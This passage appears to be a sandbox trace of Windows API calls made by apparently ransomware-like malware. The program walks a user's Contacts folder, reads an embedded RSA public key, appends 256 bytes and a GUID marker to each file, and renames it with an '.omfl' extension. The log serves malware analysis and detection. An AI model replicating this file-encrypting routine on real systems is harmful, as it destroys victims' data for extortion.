ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0130.212] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0130.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.212] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0130.212] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0130.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.213] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1174) returned 1 [0130.213] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.216] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.216] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.218] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x496, lpOverlapped=0x0) returned 1 [0130.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.219] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.219] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.220] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.220] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.220] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.220] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.220] GetLastError () returned 0x0 [0130.220] SetLastError (dwErrCode=0x0) [0130.220] GetLastError () returned 0x0 [0130.220] SetLastError (dwErrCode=0x0) [0130.220] GetLastError () returned 0x0 [0130.220] SetLastError (dwErrCode=0x0) [0130.220] GetLastError () returned 0x0 [0130.220] SetLastError (dwErrCode=0x0) [0130.220] GetLastError () returned 0x0 [0130.220] SetLastError (dwErrCode=0x0) [0130.220] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] GetLastError () returned 0x0 [0130.221] SetLastError (dwErrCode=0x0) [0130.221] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.221] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.221] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.222] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.222] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.222] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4a0) returned 0x757b558 [0130.222] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a58 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2bc0 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16aa0 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a70 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a88 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.222] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.222] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a88 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16a70 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.223] GetCurrentThreadId () returned 0x618 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5470 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.223] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.224] GetCurrentThreadId () returned 0x618 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.224] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.225] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.225] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.225] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.225] CloseHandle (hObject=0x5c8) returned 1 [0130.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.226] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.226] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.omfl")) returned 1 [0130.228] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0130.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.228] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0130.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.230] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1172) returned 1 [0130.230] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.233] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.233] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.234] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.235] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x494, lpOverlapped=0x0) returned 1 [0130.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.235] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.235] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.236] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.236] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.236] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.236] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.236] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.236] GetLastError () returned 0x0 [0130.236] SetLastError (dwErrCode=0x0) [0130.236] GetLastError () returned 0x0 [0130.236] SetLastError (dwErrCode=0x0) [0130.236] GetLastError () returned 0x0 [0130.236] SetLastError (dwErrCode=0x0) [0130.236] GetLastError () returned 0x0 [0130.236] SetLastError (dwErrCode=0x0) [0130.236] GetLastError () returned 0x0 [0130.236] SetLastError (dwErrCode=0x0) [0130.236] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.237] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.237] GetLastError () returned 0x0 [0130.237] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.238] GetLastError () returned 0x0 [0130.238] SetLastError (dwErrCode=0x0) [0130.239] GetLastError () returned 0x0 [0130.239] SetLastError (dwErrCode=0x0) [0130.239] GetLastError () returned 0x0 [0130.239] SetLastError (dwErrCode=0x0) [0130.239] GetLastError () returned 0x0 [0130.239] SetLastError (dwErrCode=0x0) [0130.239] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.239] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.239] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.239] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.239] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.239] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.239] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.239] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.239] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.239] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.239] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ae8 | out: hHeap=0x4970000) returned 1 [0130.239] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.239] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.239] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.239] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ae8 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16a88 